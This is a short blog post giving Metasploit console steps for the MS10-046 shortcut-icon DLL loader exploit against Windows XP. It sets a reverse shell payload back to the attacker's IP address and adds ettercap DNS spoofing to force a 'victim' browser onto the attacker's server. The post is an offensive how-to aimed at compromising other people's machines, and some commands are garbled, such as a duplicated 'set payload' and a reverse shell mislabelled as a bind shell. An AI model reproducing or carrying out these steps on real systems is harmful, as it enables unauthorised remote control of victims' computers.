Ubuntu shortcut icon dllloader (XP sp2 tested)


ms10_046 shortcut icon dllloader (XP sp2 tested)   Leave a comment

- Start msfconsole
- use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
– set payload set payload generic/shell_reverse_tcp
- set srvhost “your  IP Address”
– set lhost “your IP Address”
– exploit

Now you still need for the victim computer open his browser then you have to set dns spoofing to redirect when victim visit all site. (dns spoofing with ettercap and set all website redirect to your IP address). That  is.
After Victim open his browser and begin to visit some site, you will get the bind shell or command prompt.
On victim’s computer will get the window “explorer” with address’s hacker’s IP address

Berikan Komentar tentang Artikel Ini

 
Yahoo Messenger
Send Me IM!
Google Plus
Add Me To Your Circle!
Twitter
Follow Me!
Facebook
Add My Facebook
Original Template By Belajar SEO Blogspot - Himajiesized By Dayz Hidayat